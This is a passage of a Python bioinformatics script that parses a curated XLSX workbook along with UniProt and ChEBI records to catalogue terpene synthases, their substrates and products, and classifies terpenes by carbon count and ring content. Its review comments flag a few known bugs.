    ['MEPELTVPPLFSPIRQAIHPKHADIDVQTAAWAETFRIGSEELRGKLVTQDIGTFSARIL\n    PEGREEVVSLLADFILWLFGVDDGHCEEGELGHRPGDLAGLLHRLIRVAQNPEAPMMQDD\n    PLAAGLRDLRMRVDRFGTAGQTARWVDALREYFFSVVWEAAHRRAGTVPDLNDYTLMRLY\n    DGATSVVLPMLEMGHGYELQPYERDRTAVRAVAEMASFIITWDNDIFSYHKERRGSGYYL\n    NALRVLEQERGLTPAQALDAAISQRDRVMCLFTTVSEQLAEQGSPQLRQYLHSLRCFIRG\n    AQDWGISSVRYTTPDDPANMPSVFTDVPTDDSTEPLDIPAVSWWWDLLAEDARSVRRQVP\n    AQRSA']
    Still, Pandas skip two cells in a Notes column, do not know why.
    https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.notna.html#pandas.DataFrame.notna

    filename -- path to the curated XLSX workbook (data on 'Sheet1')
    Returns (uniprot_dict_of_lists, chebi_dict_of_lists, copy_without_chebi_id,
    empty_template_dict_of_lists) as produced by initialize_data_structures()
    and filled from the sheet.
    """
    _uniprot_dict_of_lists, _chebi_dict_of_lists, _copy_without_chebi_id, _empty_template_dict_of_lists = initialize_data_structures()
    _storage_df = pd.read_excel(filename, 'Sheet1', index_col=None, na_filter=True, keep_default_na=True, na_values=[' ', '\t', 'NULL', 'nan', 'null', 'n/a', 'NaN']).fillna('') # skip_blank_lines=False was removed from newer Pandas)
    _chebi_columns_without_chebi_id = ['Compound name', 'Compound description', 'Formula', 'SMILES', 'Type (mono, sesq, di, …)', 'cyclic/acyclic']
    _len = len(_storage_df['Uniprot ID'])
    # first sweep: the UniProt-level columns
    for _colname in ['Uniprot ID', 'Uniprot secondary ID', 'ChEBI ID', 'Name', 'Alternative names', 'Submitted name', 'Description', 'Species', 'Taxonomy', 'Amino acid sequence', 'Kingdom (plant, fungi, bacteria)', 'Notes', 'Publication (URL)', 'Substrate ChEBI IDs', 'Product ChEBI IDs', 'Cofactor ChEBI IDs', 'Cofactors'] + extra_product_colnames + extra_substrate_colnames + ['EC numbers', 'Rhea IDs', 'Reactions']:
        if _colname in ['Notes']:
            # 'Notes' is intentionally discarded (see module-level BUG markers)
            sys.stderr.write("Warning: Zapping up contents of column %s from %s file\n" % (_colname, filename))
            _uniprot_dict_of_lists[_colname].extend(_len * [''])
        elif _colname in _storage_df.keys():
            for _val in _storage_df[_colname]: # Pandas skip empty values from the input XLSX fields!
                _val_upper = _val.upper()
                if (_colname == 'Uniprot ID' or _colname == 'Uniprot secondary ID') and _val_upper != _val:
                    # Q5Gj59
                    raise ValueError("%s: There is a lowercase letter in the Uniprot ID" % _val)
                elif _colname == 'Amino acid sequence':
                    # re-join copy&paste-split sequences and strip whitespace
                    _uniprot_dict_of_lists[_colname].append(''.join(_val).replace('\n','').replace(' ','').upper())
                elif _colname == 'ChEBI ID':
                    if not _val or _val is np.NaN or _val =='nan':
                        _uniprot_dict_of_lists[_colname].extend(['']) # silly python needs this wrapped into a list otherwise it silently ignores the empty value
                    elif _val:
                        try:
                            # pandas returns the numeric cell as float; re-prefix with 'CHEBI:'
                            _val = sanitize_input_text_values("CHEBI:%i" % _val)
                            _uniprot_dict_of_lists[_colname].extend(_val)
                        except ValueError:
                            _uniprot_dict_of_lists[_colname].extend(['']) # silly python needs this wrapped into a list otherwise it silently ignores the empty value
                    else:
                        raise ValueError("Unexpected datatype in 'ChEBI ID' column: %s" % str(_val))
                elif _colname not in _uniprot_dict_of_lists.keys():
                    if not _val:
                        _uniprot_dict_of_lists[_colname] = ['']
                    else:
                        _uniprot_dict_of_lists[_colname].extend(sanitize_input_text_values(_val))
                elif _val:
                    _uniprot_dict_of_lists[_colname].extend(sanitize_input_text_values(_val))
                else:
                    _uniprot_dict_of_lists[_colname].extend(['']) # silly python needs this wrapped into a list otherwise it silently ignores the empty value
        else:
            sys.stderr.write("Warning: File %s lacks column %s\n" % (filename, _colname))
            _uniprot_dict_of_lists[_colname].extend(_len * [''])
    # second sweep: the ChEBI-level columns
    for _colname in ['ChEBI ID'] + _chebi_columns_without_chebi_id:
        if _colname in _storage_df.keys():
            for _val in _storage_df[_colname]:
                if _colname == 'ChEBI ID':
                    if not _val or _val is np.NaN or _val == 'nan':
                        _chebi_dict_of_lists[_colname].extend(['']) # silly python needs this wrapped into a list otherwise it silently ignores the empty value
                    elif _val:
                        try:
                            _val = sanitize_input_text_values("CHEBI:%i" % _val)
                            _chebi_dict_of_lists[_colname].extend(_val)
                        except ValueError:
                            _chebi_dict_of_lists[_colname].extend(['']) # silly python needs this wrapped into a list otherwise it silently ignores the empty value
                    else:
                        raise ValueError("Unexpected datatype in 'ChEBI ID' column: %s" % str(_val))
                else:
                    _chebi_dict_of_lists[_colname].append(sanitize_input_text_values(_val))
        else:
            sys.stderr.write("Warning: File %s lacks column %s\n" % (filename, _colname))
            _chebi_dict_of_lists[_colname].extend(_len * [''])
    del(_storage_df)
    print("Info: Parsed all data from Sheet1 of %s into memory" % filename)
    return _uniprot_dict_of_lists, _chebi_dict_of_lists, _copy_without_chebi_id, _empty_template_dict_of_lists
def recursive_translator(mylist, chebi_col, uniprot_col, uniprot_dict_of_lists, chebi_dict_of_lists, warn_once_per_chebi_entry):
    """Resolve a (possibly nested) list of ChEBI IDs into `chebi_col` values.

    mylist                    -- ChEBI ID, list of IDs, or nested lists thereof
    chebi_col                 -- column of chebi_dict_of_lists to read from
    uniprot_col               -- target uniprot column name (used for context only)
    warn_once_per_chebi_entry -- mutable list limiting empty-value warnings
                                 to one per ChEBI ID

    Returns a flat list of the resolved values; unknown IDs are skipped.
    """
    _res = []
    if mylist and isinstance(mylist, list):
        for x in mylist:
            if myoptions.debug: print("Debug: recursive_translator(): chebi_col=%s, x=%s" % (str(chebi_col), str(x)))
            if isinstance(x, list):
                # nested list: recurse and splice the flattened results in
                _res.extend(recursive_translator(x, chebi_col, uniprot_col, uniprot_dict_of_lists, chebi_dict_of_lists, warn_once_per_chebi_entry))
            elif x:
                if x in chebi_dict_of_lists['ChEBI ID']:
                    _index = chebi_dict_of_lists['ChEBI ID'].index(x)
                    if myoptions.debug: print("Debug: recursive_translator(): _index=%s" % str(_index))
                    if _index is None:
                        raise ValueError("Error: _index=%s, chebi_col=%s" % (str(_index), str(chebi_col)))
                    if chebi_col is None:
                        raise ValueError("Error: _index=%s, chebi_col=%s" % (str(_index), str(chebi_col)))
                    if chebi_dict_of_lists is None:
                        raise ValueError("Error: chebi_dict_of_lists is None, _index=%s, chebi_col=%s" % (str(_index), str(chebi_col)))
                    if myoptions.debug: print("Debug: recursive_translator(): chebi_dict_of_lists[chebi_col]=%s" % str(chebi_dict_of_lists[chebi_col]))
                    _some_res = chebi_dict_of_lists[chebi_col][_index]
                    if _some_res:
                        _res.extend(_some_res)
                    else:
                        # CHEBI:59720 - HPETE anion
                        # contains no SMILES and other fields at all
                        if x not in warn_once_per_chebi_entry:
                            # raise this warning just once per substance, makes no sense to have zillions of warning about
                            # CHEBI:15379: The column 'Compound description' contains '[]'
                            # Unfortunately this should be per ChEBI ID + chebi_col pair or, TODO:, be postponed to upper code,
                            # e.g. append_substrates_and_products() to append the x value to the list later after all warnings are issued,
                            # otherwise only one warning is issued for such ChEBI entry although more columns are problematic/empty
                            sys.stderr.write("Warning: %s: The column '%s' contains '%s'\n" % (str(x), str(chebi_col), str(_some_res)))
                            warn_once_per_chebi_entry.append(x)
                else:
                    if myoptions.debug:
                        print("Debug: recursive_translator(): x=%s is not in chebi_dict_of_lists['ChEBI ID'], why?" % str(x))
            if myoptions.debug:
                print("Debug: recursive_translator(): _res=%s" % str(_res))
    else:
        # scalar input: translate the single ID when known
        if mylist and mylist in chebi_dict_of_lists['ChEBI ID']:
            _index = chebi_dict_of_lists['ChEBI ID'].index(mylist)
            _res.extend(chebi_dict_of_lists[chebi_col][_index])
        else:
            if myoptions.debug:
                print("Debug: recursive_translator(): x=%s is not in chebi_dict_of_lists['ChEBI ID'], why??" % str(mylist))
    return _res
def translator(extra_colnames, nestedlists, column_pairs, uniprot_dict_of_lists, chebi_dict_of_lists, warn_once_per_chebi_entry):
    """Push the data for _product_ids, _substrate_ids, _cofactor_ids into uniprot_dict_of_lists.

    extra_colnames -- uniprot columns that get an empty-string placeholder
                      when `nestedlists` is empty
    nestedlists    -- (possibly nested) list of ChEBI IDs to resolve
    column_pairs   -- [chebi_col, uniprot_col] pairs mapping source ChEBI
                      columns onto target uniprot columns
    """
    if not nestedlists:
        for _colname in extra_colnames:
            uniprot_dict_of_lists[_colname].append('')
    else:
        for _chebi_col, _uniprot_col in column_pairs:
            if myoptions.debug:
                print("    nestedlists=%s" % str(nestedlists))
            _res = recursive_translator(nestedlists, _chebi_col, _uniprot_col, uniprot_dict_of_lists, chebi_dict_of_lists, warn_once_per_chebi_entry)
            uniprot_dict_of_lists[_uniprot_col].append(_res)
            if myoptions.debug:
                print("Debug: translator(): uniprot_dict_of_lists[%s][-1]=%s, _chebi_col=%s, _uniprot_col=%s" % (_uniprot_col, str(uniprot_dict_of_lists[_uniprot_col][-1]), str(_chebi_col), str(_uniprot_col)))
def append_substrates_and_products(uniprot_dict_of_lists, chebi_dict_of_lists, _substrate_ids, _product_ids, warn_once_per_chebi_entry):
    """Fan out ChEBI-derived data into product- and substrate-specific columns.

    The same ChEBI fields (name, description, formula, SMILES) feed two
    parallel column families, one for products and one for substrates;
    missing ID lists get an empty-string placeholder per column. The
    ChEBI IDs themselves were already written by upstream code.
    """
    _product_pairs = [['Compound name', 'Name of product'], ['Compound description', 'Product compound description'], ['Formula', 'Chemical formula of product'], ['SMILES', 'SMILES of product (including stereochemistry)']]
    _substrate_pairs = [['Compound name', 'Substrate (including stereochemistry)'], ['Compound description', 'Substrate compound description'], ['Formula', 'Chemical formula of substrate'], ['SMILES', 'SMILES of substrate (including stereochemistry)']]
    if _product_ids:
        translator(extra_product_colnames, _product_ids, _product_pairs, uniprot_dict_of_lists, chebi_dict_of_lists, warn_once_per_chebi_entry)
    else:
        for _colname in extra_product_colnames:
            uniprot_dict_of_lists[_colname].append('')
    if _substrate_ids:
        translator(extra_substrate_colnames, _substrate_ids, _substrate_pairs, uniprot_dict_of_lists, chebi_dict_of_lists, warn_once_per_chebi_entry)
    else:
        for _colname in extra_substrate_colnames:
            uniprot_dict_of_lists[_colname].append('')
def get_cyclic_terpene_synthases(primary_accession, reactions, ec_numbers, rhea_ids, chebi_ids, chebi_dict_of_lists):
    """Parse ChEBI ID values mentioned in the UniProt record under
    <comment type="catalytic activity">
    </comment>
    tag. From there we parse out practically only ChEBI IDs for water,
    the ions are not annotated there.
    Cofactors are annotated under
    <comment type="cofactor">
      <cofactor evidence="1">
        <name>Mg(2+)</name>
        <dbReference type="ChEBI" id="CHEBI:18420"/>
      </cofactor>
    </comment>
    tag.
    We should either merge them together or just use only the latter.

    reactions/ec_numbers/rhea_ids/chebi_ids -- parallel per-reaction lists
    Returns (substrate_ids, product_ids), each naturally sorted.
    """
    _substrate_ids = []
    _product_ids = []
    _cofactor_ids = []
    # now iterate over all reactions and process (reactions, ec_numbers, rhea_ids, chebi_ids) simultaneously
    for _reaction, _ec_number, _rhea_id, _chebi_id in zip(reactions, ec_numbers, rhea_ids, chebi_ids):
        if myoptions.debug:
            print("Debug: get_cyclic_terpene_synthases(): %s: unzipped values from (reactions=%s, ec_numbers=%s, rhea_ids=%s, chebi_ids=%s)" % (primary_accession, str(_reaction), str(_ec_number), str(_rhea_id), str(_chebi_id)))
        # classify each reaction's ChEBI IDs into the substrate/product lists in place
        split_chebi_data_into_substrates_and_products_wrapper(primary_accession, chebi_dict_of_lists, _chebi_id, _substrate_ids, _product_ids)
        if myoptions.debug:
            print("Debug: get_cyclic_terpene_synthases(): %s: resulting in _substrate_ids=%s, _cofactor_ids=%s, _product_ids=%s" % (primary_accession, str(_substrate_ids), str(_cofactor_ids), str(_product_ids)))
    return natsorted(_substrate_ids), natsorted(_product_ids)
def process_parsed_uniprot_values(all_uniprot_ids, all_chebi_ids, uniprot_dict_of_lists, chebi_dict_of_lists, already_parsed, primary_accession, secondary_accessions, chebi_ids, rhea_ids, ec_numbers, reactions, cofactor_ids, cofactors, recommended_name, alternative_names, submitted_name, feature_descriptions, organism, lineage, sequence, uniprot_pri_acc2aliases, uniprot_aliases2pri_acc, primaries, warn_once_per_chebi_entry):
    """Process a single Uniprot entry along with getting data from ChEBI-dictlist.

    Appends one row (one value per column) to uniprot_dict_of_lists for a
    not-yet-seen primary accession, updates the global ID registries and
    alias maps, and finally asserts that every column list stayed the same
    length. Entries already parsed (directly or via an alias) are skipped.
    """
    if myoptions.debug:
        print("Debug: process_parsed_uniprot_values(): primary_accession=%s, reactions=%s, ec_numbers=%s, rhea_ids=%s, chebi_ids=%s, len(chebi_dict_of_lists['ChEBI ID'])=%s" % (str(primary_accession), str(reactions), str(ec_numbers), str(rhea_ids), str(chebi_ids), len(chebi_dict_of_lists['ChEBI ID'])))
    _substrate_ids, _product_ids = get_cyclic_terpene_synthases(primary_accession, reactions, ec_numbers, rhea_ids, chebi_ids, chebi_dict_of_lists)
    _already_parsed_aliases = [x for x in secondary_accessions if x in already_parsed]
    if primary_accession not in primaries:
        primaries.append(primary_accession)
    if primary_accession and primary_accession not in already_parsed and primary_accession not in _already_parsed_aliases:
        # parse values for ChEBI entries mentioned in the UniProt record
        if myoptions.debug:
            print("Debug: Storing parsed values for Uniprot entry %s into uniprot_dict_of_lists" % primary_accession)
        if primary_accession not in all_uniprot_ids:
            all_uniprot_ids.update([primary_accession])
            all_uniprot_ids.update(secondary_accessions)
        if myoptions.debug:
            print("Debug: process_parsed_uniprot_values(): chebi_ids=%s" % str(chebi_ids))
        for _chebi_id in chebi_ids:
            if _chebi_id: # discard '' values
                if isinstance(_chebi_id, list): # BUG: seems sometimes we receive a nested list of values and sometimes just a list of values
                    # NOTE(review): _my_chebi_id is never used; the same set is
                    # re-added on every loop iteration -- confirm intended
                    for _my_chebi_id in _chebi_id:
                        all_chebi_ids.update(set(_chebi_id))
                else:
                    # NOTE(review): when _chebi_id is a plain string, set(_chebi_id)
                    # splits it into single characters; .add() was likely intended
                    all_chebi_ids.update(set(_chebi_id))
        if secondary_accessions:
            if primary_accession not in uniprot_pri_acc2aliases.values():
                for _secondary_accession in secondary_accessions:
                    uniprot_aliases2pri_acc[_secondary_accession] = primary_accession
                uniprot_pri_acc2aliases[primary_accession] = secondary_accessions
        uniprot_dict_of_lists['Uniprot ID'].append(primary_accession) # append a string value
        uniprot_dict_of_lists['Uniprot secondary ID'].append(secondary_accessions) # append a list of string values
        uniprot_dict_of_lists['ChEBI ID'].append(chebi_ids) # uniprot_dict_of_lists[ChEBI ID][-1]=[['CHEBI:15385', 'CHEBI:33019', 'CHEBI:175763']]
        uniprot_dict_of_lists['EC numbers'].append(ec_numbers) # uniprot_dict_of_lists[EC numbers][-1]=['4.2.3.13']
        uniprot_dict_of_lists['Rhea IDs'].append(rhea_ids) # uniprot_dict_of_lists[Rhea IDs][-1]=['RHEA:19525']
        uniprot_dict_of_lists['Reactions'].append(reactions) # uniprot_dict_of_lists[Reactions][-1]=['(2E,6E)-farnesyl diphosphate = (1S,8aR)-delta-cadinene + diphosphate']
        # When we parse a non-terpene-cyclase reaction we end up with a single reaction annotated but none of the ChEBI IDs gets assigned to a product
        # In such scenarios downstream len() checks fail because len(uniprot_dict_of_lists['Product ChEBI IDs'][uniprot_id]) == 0 whereas len(uniprot_dict_of_lists['Reactions'][uniprot_id]) != 0
        # for example Q50L36
        uniprot_dict_of_lists['Substrate ChEBI IDs'].append(_substrate_ids) # uniprot_dict_of_lists[Substrate ChEBI IDs][-1]=[['CHEBI:175763']]
        uniprot_dict_of_lists['Cofactor ChEBI IDs'].append(cofactor_ids) # uniprot_dict_of_lists[Cofactor ChEBI IDs][-1]=[[]]
        uniprot_dict_of_lists['Cofactors'].append(cofactors)
        uniprot_dict_of_lists['Product ChEBI IDs'].append(_product_ids) # uniprot_dict_of_lists[Product ChEBI IDs][-1]=[['CHEBI:15385']]
        append_substrates_and_products(uniprot_dict_of_lists, chebi_dict_of_lists, _substrate_ids, _product_ids, warn_once_per_chebi_entry)
        uniprot_dict_of_lists['Name'].append(recommended_name) # For compatibility with Adela I stick here to 'Name' column name
        uniprot_dict_of_lists['Alternative names'].append(alternative_names)
        uniprot_dict_of_lists['Submitted name'].append(submitted_name)
        uniprot_dict_of_lists['Description'].append(feature_descriptions)
        uniprot_dict_of_lists['Species'].append(organism)
        uniprot_dict_of_lists['Taxonomy'].append(lineage)
        uniprot_dict_of_lists['Amino acid sequence'].append(sequence)
        # derive a coarse kingdom label from the taxonomy lineage
        _taxlen = len(lineage)
        if not lineage:
            _kingdom = ''
        elif 'Bacteria' == lineage[0]: # some taxons are only assigned as ['Bacteria'], without further specs
            _kingdom = 'Bacteria'
        elif 'Archaea' == lineage[0]: # some taxons are only assigned as ['Archaea'], without further specs
            _kingdom = 'Archaea'
        elif _taxlen > 1 and 'Viridiplantae' == lineage[1]:
            _kingdom = 'Plantae'
        elif _taxlen > 1 and 'Fungi' == lineage[1]:
            _kingdom = 'Fungi'
        elif 'Homo sapiens' in lineage:
            _kingdom = 'Human'
        elif 'Animalia' in lineage:
            _kingdom = 'Animal'
        else:
            _kingdom = 'unknown'
        uniprot_dict_of_lists['Kingdom (plant, fungi, bacteria)'].append(_kingdom)
        uniprot_dict_of_lists['Notes'].append('') # BUG
        uniprot_dict_of_lists['Publication (URL)'].append('') # BUG
        already_parsed.append(primary_accession)
    else:
        if primary_accession not in already_parsed:
            already_parsed.append(primary_accession)
            if myoptions.xls_storage and myoptions.xls_storage !='None':
                print("Info: %s: Accession or its secondary accessions %s already parsed from %s file and is in already_parsed=%s" % (primary_accession, str(secondary_accessions), myoptions.xls_storage, str(already_parsed)))
            else:
                sys.stderr.write("Warning: %s: Accession used in %s file is actually one of its secondary aliases %s\n" % (primary_accession, myoptions.xls_storage, str(secondary_accessions)))
    # sanity check: every column list must have grown in lockstep
    _l = len(uniprot_dict_of_lists['Uniprot ID'])
    for x in uniprot_dict_of_lists.keys():
        if myoptions.verbose:
            print("Info: %s: uniprot_dict_of_lists['%s'] has length %d" % (primary_accession, x, len(uniprot_dict_of_lists[x])))
        if myoptions.debug:
            print("Debug: process_parsed_uniprot_values(): %s: uniprot_dict_of_lists['%s'][-1]=%s" % (primary_accession, x, str(uniprot_dict_of_lists[x][-1])))
        if _l != len(uniprot_dict_of_lists[x]):
            if myoptions.debug:
                print("Debug: process_parsed_uniprot_values(): %s: uniprot_dict_of_lists['%s']=%s" % (primary_accession, x, str(uniprot_dict_of_lists[x])))
            raise ValueError("len(uniprot_dict_of_lists['Uniprot ID'])=%d != len(uniprot_dict_of_lists['%s'])=%d" % (len(uniprot_dict_of_lists['Uniprot ID']), x, len(uniprot_dict_of_lists[x])))
def fetch_ids_from_xlsx(filename, primaries, uniprot_pri_acc2aliases, uniprot_aliases2pri_acc, uniprot_dict_of_lists, already_parsed, all_uniprot_ids, all_chebi_ids):
    """Read the 'Uniprot ID' column from 'Sheet1' of an XLSX file and return a
    de-duplicated, order-preserving list of accessions to act upon.

    Cells may contain several accessions (a primary plus secondary aliases);
    each is resolved to its primary accession via uniprot_aliases2pri_acc and
    its single-entry XML is downloaded into the cache unless already parsed.
    The uniprot_dict_of_lists/all_uniprot_ids/all_chebi_ids parameters are
    currently unused here but kept for interface compatibility with callers.
    """
    _ids = []
    _aliases = uniprot_pri_acc2aliases.values()
    _df = pd.read_excel(filename, 'Sheet1', index_col=None, na_values=["NA"])
    for i in _df['Uniprot ID']:
        _sub_i = sanitize_input_text_values(i)
        if len(_sub_i) > 1:
            for _ii in _sub_i:
                print("Info: Looping over %s from %s, originates from %s" % (_ii, filename, str(i)))
                _id = None
                # remove redundancies but keep ordering
                if _ii is not None and _ii not in already_parsed:
                    # check if this is a primary accession, if not, convert it to primary
                    if _ii in primaries:
                        # already known primary accession, probably already in cache but maybe inferred from other sources
                        _filename = download_uniprot(_ii)
                        _id = _ii
                    elif _ii in _aliases:
                        # is a secondary/alias accession
                        _iii = uniprot_aliases2pri_acc[_ii]
                        _id = str(_iii)
                        if _iii in already_parsed:
                            # we already have parsed the primary acc uniprot entry into memory
                            print("Info: Entry %s is an alias pointing to %s which we already have, skipping download" % (_ii, _iii))
                            _filename = None # prevent duplicated parsing of the input XML
                        elif _iii not in uniprot_aliases2pri_acc.keys():
                            # BUGFIX: the old message claimed the download was being skipped
                            # although download_uniprot() is called right below
                            print("Info: Entry %s is an alias pointing to %s, downloading it unless already cached" % (_ii, _iii))
                            _filename = download_uniprot(_iii)
                    else:
                        # new or already known primary accession
                        print("Info: Entry %s is new primary accession, downloading if not existing yet" % (_ii))
                        _filename = download_uniprot(_ii)
                        _id = _ii
                if _id and _id not in _ids:
                    _ids.append(_id)
        else:
            # there are no secondary accessions
            if _sub_i[0] and _sub_i[0] not in _ids:
                _ids += _sub_i
                if _sub_i[0] not in already_parsed:
                    _filename = download_uniprot(_sub_i[0])
                else:
                    # BUGFIX: this message used to be printed unconditionally,
                    # even immediately after a download had just happened
                    print("Info: Entry %s was already parsed into memory, skipping single-entry XML download." % (_sub_i[0]))
    return _ids
# Matches the carbon-count token of a molecular formula, e.g. 'C15' in 'C15H24'.
_r1 = re.compile(r'C[0-9]+')
def classify_terpene(formula):
    """Classify a terpene by the carbon count parsed from its molecular formula.

    Examples: C15H24 (delta-cadinene, CHEBI:15385) -> 'sesq',
    C35H58O (sporulenol, CHEBI:67182) -> 'sesquar'.

    Returns one of 'mono', 'sesq', 'di', 'sest', 'tri', 'sesquar', 'tetra',
    'unexpected' (carbon count outside all known windows), or None when the
    formula carries no/too few carbons (e.g. CHEBI:35757 <FORMULA>CO2R</FORMULA>).
    """
    _hit = _r1.search(formula)
    # Strip the leading 'C' of the matched token to get the carbon count.
    _carbons = int(_hit.group(0)[1:]) if _hit else 0
    if not _carbons or _carbons < 6:
        # formula without a usable carbon count (zero or one carbon)
        return None
    # Inclusive carbon-count windows mapped to terpene classes.
    for _low, _high, _label in (
            (13, 16, 'sesq'),
            (9, 12, 'mono'),
            (19, 21, 'di'),
            (29, 31, 'tri'),
            (32, 36, 'sesquar'),
            (39, 41, 'tetra'),
            (24, 26, 'sest')):
        if _low <= _carbons <= _high:
            return _label
    return 'unexpected'
def is_cyclic(smiles):
    """Return True when the SMILES string contains at least one ring,
    False when the molecule is acyclic, and None when no SMILES string
    was given or RDKit (Chem) is unavailable."""
    if not (smiles and Chem):
        return None
    _mol = Chem.MolFromSmiles(smiles)
    _ring_info = _mol.GetRingInfo()
    return _ring_info.NumRings() > 0
def initialize_data_structures():
    """Build the empty column-oriented tables used throughout the script.

    Returns a 4-tuple of dicts mapping column name -> empty list:
    (uniprot table, chebi table, chebi table without the 'ChEBI ID' column,
    output template = uniprot columns plus the two ChEBI-derived columns).
    Relies on module-level extra_product_colnames/extra_substrate_colnames.
    """
    _uniprot_columns = ['Uniprot ID', 'Uniprot secondary ID', 'Name', 'Alternative names', 'Submitted name', 'Description', 'Species', 'Taxonomy', 'Amino acid sequence', 'Kingdom (plant, fungi, bacteria)', 'ChEBI ID', 'EC numbers', 'Rhea IDs', 'Reactions', 'Substrate ChEBI IDs', 'Product ChEBI IDs', 'Cofactor ChEBI IDs', 'Cofactors', 'Notes', 'Publication (URL)']
    _chebi_columns = ['ChEBI ID', 'Compound name', 'Compound description', 'Formula', 'SMILES', 'Type (mono, sesq, di, …)', 'cyclic/acyclic']
    _uniprot_table = {_name: [] for _name in _uniprot_columns}
    _chebi_table = {_name: [] for _name in _chebi_columns}
    for _extra in extra_product_colnames + extra_substrate_colnames:
        _uniprot_table[_extra] = []
    # same columns as the ChEBI table, minus the ID column
    _chebi_without_id = {_name: [] for _name in _chebi_columns if _name != 'ChEBI ID'}
    # the output template carries all Uniprot columns plus the two
    # ChEBI-derived classification columns
    _template = {_name: [] for _name in _uniprot_table}
    _template['Type (mono, sesq, di, …)'] = []
    _template['cyclic/acyclic'] = []
    return _uniprot_table, _chebi_table, _chebi_without_id, _template
def split_chebi_data_into_substrates_and_products_wrapper(primary_accession, chebi_dict_of_lists, chebi_ids, substrate_ids, product_ids):
    """Categorize the ChEBI IDs of one reaction and record the outcome.

    Always appends exactly one entry to both substrate_ids and product_ids so
    their lengths stay in sync with the reaction list — even when every ChEBI
    ID of the reaction was discarded as an acyclic terpene with no known
    substrate (e.g. Q50L36: dimethylallyl diphosphate = diphosphate + isoprene).
    """
    if myoptions.verbose: print("Info: %s: Received: chebi_ids=%s, chebi_dict_of_lists=%s, substrate_ids=%s, product_ids=%s" % (primary_accession, str(chebi_ids), str(chebi_dict_of_lists), str(substrate_ids), str(product_ids)))
    _subs, _prods = split_chebi_data_into_substrates_and_products(primary_accession, chebi_ids, chebi_dict_of_lists)
    if not _subs and not _prods:
        # placeholders keep len(reactions) == len(product_ids) == len(substrate_ids)
        substrate_ids.append([])
        product_ids.append([])
    else:
        substrate_ids.append(_subs)
        product_ids.append(_prods)
def split_chebi_data_into_substrates_and_products(primary_accession, chebi_ids, chebi_dict_of_lists):
    """Split the ChEBI IDs of one reaction into substrates and products.

    Each ID is first parsed via process_chebi() (which fills
    chebi_dict_of_lists as a side effect), then routed by the module-level
    'substrates', 'possible_cofactors' and
    'non_terpene_and_acyclic_terpene_chebi_ids' sets. Returns a
    naturally-sorted (substrate_ids, product_ids) pair.

    NOTE(review): _cofactor_ids is accumulated but never returned — presumably
    cofactors are recorded elsewhere; confirm before removing the branch (it
    must stay so cofactors do not fall through into the product branches).
    """
    _substrate_ids = []
    _cofactor_ids = []
    _product_ids = []
    for _chebi_id in chebi_ids:
        if _chebi_id:
            _terpene_type = process_chebi(_chebi_id, chebi_dict_of_lists) # parse ChEBI XML files and fill chebi_dict_of_lists
            if _chebi_id in substrates:
                _substrate_ids.append(_chebi_id)
            elif _chebi_id in possible_cofactors:
                _cofactor_ids.append(_chebi_id)
            elif myoptions.run_mode == 'CYPs':
                _product_ids.append(_chebi_id) # probably should also come up with a blacklist of radicals, oxygen, etc., like for the 'terpene_synthases' run_mode
            #elif _chebi_id in intermediates:
            #    # CHEBI:63190 (+)-β-caryophyllene aka (S)-β-bisabolene
            #    # CHEBI:58622 9α-copalyl diphosphate
            #    # CHEBI:58553 ent-copalyl diphosphate
            #    # CHEBI:64283 copal-8-ol diphosphate(3−)
            #    # CHEBI:58635 CHEBI:30939 CHEBI:10760, CHEBI:29558 (+)-copalyl diphosphate, see e.g. H8ZM70
            #    intermediate_ids.append(_chebi_id2)
            #    _has_intermediate = True
            elif _chebi_id in non_terpene_and_acyclic_terpene_chebi_ids:
                # A0A2N0DJE2 catalyzes 'isopentenyl diphosphate = dimethylallyl diphosphate' reaction, we want to discard such enzymes
                # A0A3L6DH13 catalyzes 'a quinone + H(+) + NADH = a quinol + NAD(+)', 'a quinone + H(+) + NADPH = a quinol + NADP(+)' reaction
                # 'CHEBI:33019' diphosphate(3−)
                # 'CHEBI:57945' NADH(2-)
                # 'CHEBI:58349' NADP(3-)
                # is not a product nor a cofactor nor a substrate, just skip it
                # BUGFIX: removed a stray 'pass' statement that preceded this print
                print("Debug: %s: split_chebi_data_into_substrates_and_products(): Skipping this non-terpene ChEBI ID" % _chebi_id)
            elif _terpene_type:
                # recognized (cyclic) terpene class — treat as a product
                _product_ids.append(_chebi_id)
            elif myoptions.run_mode == 'terpene_synthases':
                print("Warning: %s: Unexpected compound %s or a good candidate for non_terpene_and_acyclic_terpene_chebi_ids blacklist" % (_chebi_id, str(_terpene_type)))
    if not _product_ids and myoptions.run_mode == 'terpene_synthases':
        # Q50L36: dimethylallyl diphosphate = diphosphate + isoprene
        print("Info: %s: Failed to find a cyclic terpene product in any of these: %s" % (primary_accession, str(chebi_ids))) # CHEBI:15385 (+)-δ-cadinene
    if myoptions.debug: print("Debug: split_chebi_data_into_substrates_and_products(): Returning _substrate_ids=%s, _product_ids=%s" % (str(_substrate_ids), str(_product_ids)))
    return natsorted(_substrate_ids), natsorted(_product_ids)
def print_dict_lengths(somedict, dictname):
    """Log the length of every column list in *somedict*, labelled *dictname*.

    The first (terse) line is emitted only at high debug verbosity; the
    informational line is printed for every key unconditionally.
    """
    for _key, _values in somedict.items():
        if myoptions.debug > 3: print("%s: Key=%s, len=%d" % (dictname, _key, len(_values)))
        print("Info: Will output into CSV and XLS files in total %s: Key=%s, len=%d" % (dictname, _key, len(_values)))
def convert_to_primary_ids(ids, primaries, aliases, ids_parsed_from_xls_storage, uniprot_aliases2pri_acc):
    """Map every requested accession to its primary form.

    Known primaries are kept as-is, aliases are translated through
    uniprot_aliases2pri_acc, and unknown accessions are uppercased and kept
    (we cannot tell whether they are primary or secondary). Duplicates and
    accessions already present in ids_parsed_from_xls_storage are dropped;
    input ordering of the survivors is preserved.
    """
    _converted = []
    for _accession in ids:
        if _accession in primaries:
            _candidate = _accession
        elif _accession in aliases:
            _candidate = uniprot_aliases2pri_acc[_accession]
        else:
            # neither a known primary nor a known alias: keep it, normalized
            _converted.append(_accession.upper())
            continue
        if _candidate not in _converted and _candidate not in ids_parsed_from_xls_storage:
            _converted.append(_candidate)
        else:
            if myoptions.debug: print("Debug: Discarded %s from _ids" % _candidate)
    return _converted
def parse_idfile(infile):
    """Read one Uniprot accession per line from *infile*.

    Returns the unique, non-empty IDs in file order; an empty list when the
    file does not exist. Duplicated IDs trigger a stderr warning and are
    kept only once.
    """
    _ids = []
    if os.path.exists(infile):
        with open(infile) as _tsv_file:
            for _line in _tsv_file:
                # BUGFIX: strip() alone removes the trailing newline; the
                # previous _line[:-1] chopped the last character of a final
                # line that lacked a newline terminator
                _id = _line.strip()
